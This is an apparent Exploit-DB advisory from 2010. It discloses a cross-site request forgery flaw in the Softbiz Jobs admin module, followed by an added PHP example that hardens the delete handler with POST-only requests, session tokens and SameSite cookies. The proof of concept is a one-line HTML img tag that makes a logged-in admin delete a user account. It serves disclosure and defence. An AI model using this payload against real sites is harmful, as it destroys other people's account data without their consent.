Softbiz Jobs – Cross-Site Request Forgery

  • Author: pratul agrawal
    Date: 2010-02-23
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/11543/
  •  =======================================================================
     
     Softbiz Jobs CSRF Vulnerability
     =======================================================================
     
     by
     
     Pratul Agrawal
     
     
    # Vulnerability found in: Admin module
     
    # Email: Pratulag@yahoo.com
     
    # Company: aksitservices
     
    # Credit: Pratul Agrawal
    
    # Download: http://www.softbizscripts.com/
    
    # Script: softbizscripts
    
     
     
    # Proof of concept
    
    Script to delete the registered user through Cross Site request forgery
    
     ...................................................................................................................
    
    <html>
    
    <body>
    
    <img src=http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID] /> 
    
    </body>
    
    </html>
    
    
     ...................................................................................................................
    
    
    
    After execution, refresh the page and you can see that the user with id=20 has been deleted automatically.
    
     
    # If you have any questions, comments, or concerns, feel free to contact me.
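
The proof of concept works because the admin delete action runs on a plain GET request with no per-session secret. The following is an added example, not Softbiz code and not part of the original advisory, showing how such a handler can be hardened. The function name `handle_delete_employer`, the `is_admin` and `csrf_token` session keys, and the `employers` table are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Added example (not vendor code): hardened delete handler for an admin module.
// Assumed names: handle_delete_employer(), session keys, table `employers`.

// Returns the HTTP status code the endpoint should send.
function handle_delete_employer(PDO $db, string $method, array $post, array $session): int
{
    // 1. State changes only via POST; an <img> tag can only issue a GET.
    if ($method !== 'POST') {
        return 405;
    }
    // 2. Caller must hold an authenticated admin session (assumed flag).
    if (empty($session['is_admin'])) {
        return 403;
    }
    // 3. The form must echo back the per-session token; compare in constant time.
    $sent     = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    if (!is_string($sent) || !is_string($expected) || $expected === ''
        || !hash_equals($expected, $sent)) {
        return 403;
    }
    // 4. Validate the id and delete with a prepared statement.
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return 400;
    }
    $db->prepare('DELETE FROM employers WHERE id = ?')->execute([$id]);
    return 200;
}

// Constructed demo data: in-memory SQLite with one employer row (id 20).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE employers (id INTEGER PRIMARY KEY)');
$db->exec('INSERT INTO employers (id) VALUES (20)');
// The token is generated at login and embedded as a hidden field in the admin form.
$session = ['is_admin' => true, 'csrf_token' => bin2hex(random_bytes(32))];

// Cross-site GET as sent by the <img> tag: refused before any data is touched.
echo handle_delete_employer($db, 'GET', [], $session), "\n";
// Cross-site POST without the token: refused.
echo handle_delete_employer($db, 'POST', ['id' => '20'], $session), "\n";
// Request from the real admin form, carrying the session token: accepted.
$form = ['id' => '20', 'csrf_token' => $session['csrf_token']];
echo handle_delete_employer($db, 'POST', $form, $session), "\n";
```

Setting the session cookie with `SameSite=Lax` or `SameSite=Strict` adds a second layer, since the browser then withholds the cookie on cross-site subresource requests such as the image load above.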